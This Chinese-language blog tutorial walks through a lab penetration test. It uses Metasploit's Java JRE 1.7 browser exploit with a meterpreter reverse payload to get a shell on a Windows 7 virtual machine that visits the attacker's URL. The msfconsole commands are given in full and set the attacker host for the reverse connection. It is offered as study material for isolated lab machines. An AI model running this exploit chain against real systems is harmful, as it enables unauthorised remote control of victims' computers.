Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透4 —基于 java 环境的漏洞利用获取 shell

目录

基于 java 环境的漏洞利用获取 shell

(1)实战-使用 java 模块 getshell

(2)win7 安装java环境,并浏览生成的http连接 ==》kali得到shell


Metasploitable2-linux:靶机 192.168.234.8

kali-debian:攻击机 192.168.234.141

win7 虚拟机:靶机 192.168.234.158

在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!

基于 java 环境的漏洞利用获取 shell

总结:

        (1)使用exploit/multi/browser/java_jre17_driver_manager模块,设置payload为/java/meterpreter/reverse_http,并开启监听

                                        ===》生成http链接

        (2)win7 安装java环境,并浏览生成的http连接 ==》kali得到shell

注意需要启动apache服务器才能运行

注:为什么必须启用apache服务?

        木马和病毒都是封装在http数据包(通过http进行下载安装),apache服务器是解析http数据包,木马文件封装在响应里返回给用户(靶机) ==》所以需要启用apache服务器来用于解析数据包

搭建 java 环境

第一步我们先安装 java 环境上传 jre 到 win7 或 xp 操作系统

注:通过此案例,告诉大家,软件升级还是很重要的

若无法下载或者没有资源、无法访问,可直接在百度网盘接收文件

链接:https://pan.baidu.com/s/1qNWy8BWilBPoTZRXgx5WdQ?pwd=04sz 
提取码:04sz 

(1)实战-使用 java 模块 getshell

root@zwzj:~# systemctl start apache2                 ——启动kali 自带 apache 服务器

msf6 > use exploit/multi/browser/java_jre17_driver_manager

msf6 exploit(multi/browser/java_jre17_driver_manager) > show options

注:看到这里 target 是一个通用的 java payload。 我们可以自己指定一个

msf6 exploit(multi/browser/java_jre17_driver_manager) > show payloads

                                                        ——查看此java模块可以使用的 payload

msf6 exploit(multi/browser/java_jre17_driver_manager) > set payload /java/meterpreter/reverse_tcp

msf6 exploit(multi/browser/java_jre17_driver_manager) > set LHOST 192.168.234.141

msf6 exploit(multi/browser/java_jre17_driver_manager) > jobs -K

                                                                ——K必须大写 ——删除所有监听

msf6 exploit(multi/browser/java_jre17_driver_manager) > exploit

(2)win7 安装java环境,并浏览生成的http连接 ==》kali得到shell

win7 主机访问http://192.168.234.141:8080/9p3pDdb

                                                                ——win7需要配置远程连接端口为4444

提示我们 java 版本需要更新我们点击 later 先不更新

然后发现win7运行了一个 java 程序,但是用户关闭了 java 程序也不影响我们 session 的正常访问。

回到 MSF 控制台

Session 已经建立

msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions -i 1 --开启指定会话

meterpreter > getuid

Server username: root

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值